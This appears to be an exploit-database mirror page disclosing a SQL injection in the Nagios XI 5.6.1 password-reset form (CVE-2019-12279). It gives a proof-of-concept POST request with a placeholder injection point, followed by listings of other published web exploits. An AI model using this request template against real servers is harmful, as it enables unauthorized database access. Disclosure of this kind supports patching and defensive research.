"Nagios XI 5.6.1 - SQL injection"

Author

Exploit author

JameelNabbo

Platform

Exploit platform

php

Release date

Exploit published date

2019-05-23

 Download file
# Exploit Title: Nagiosxi username sql injection
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.nagios.com
# Software Link: https://www.nagios.com/products/nagios-xi/
# Version: xi-5.6.1
# Tested on: MacOSX
#CVE: CVE-2019-12279

POC:

POST /nagiosxi/login.php?forgotpass HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/nagiosxi/login.php?forgotpass
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Connection: close
Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6
Upgrade-Insecure-Requests: 1

page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION}

Release Date	Title	Type	Platform	Author
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-05-28	"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-28	"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"	webapps	php	Th3GundY
2020-05-28	"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"	webapps	multiple	"Berk Dusunur"
2020-05-27	"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-27	"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"	webapps	php	"that faceless coder"
2020-05-27	"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"OXID eShop 6.3.4 - 'sorting' SQL Injection"	webapps	php	VulnSpy

Release Date	Title	Type	Platform	Author
2020-05-28	"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"	webapps	php	Th3GundY
2020-05-28	"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-05-27	"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"	webapps	php	"China Banking and Insurance Information Technology Management Co."
2020-05-27	"OXID eShop 6.3.4 - 'sorting' SQL Injection"	webapps	php	VulnSpy
2020-05-27	"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-27	"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"	webapps	php	"that faceless coder"
2020-05-27	"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"	webapps	php	"Matthew Aberegg"
2020-05-26	"OpenEMR 5.0.1 - Remote Code Execution"	webapps	php	"Musyoka Ian"

Release Date	Title	Type	Platform	Author
2019-06-04	"IceWarp 10.4.4 - Local File Inclusion"	webapps	php	JameelNabbo
2019-05-27	"Deltek Maconomy 2.2.5 - Local File Inclusion"	webapps	multiple	JameelNabbo
2019-05-23	"Nagios XI 5.6.1 - SQL injection"	webapps	php	JameelNabbo
2019-03-04	"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution"	webapps	hardware	JameelNabbo
2019-02-15	"Jinja2 2.10 - 'from_string' Server Side Template Injection"	webapps	python	JameelNabbo
2018-02-16	"Twig < 2.4.4 - Server Side Template Injection"	webapps	php	JameelNabbo

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/46910/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"Nagios XI 5.6.1 - SQL injection"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.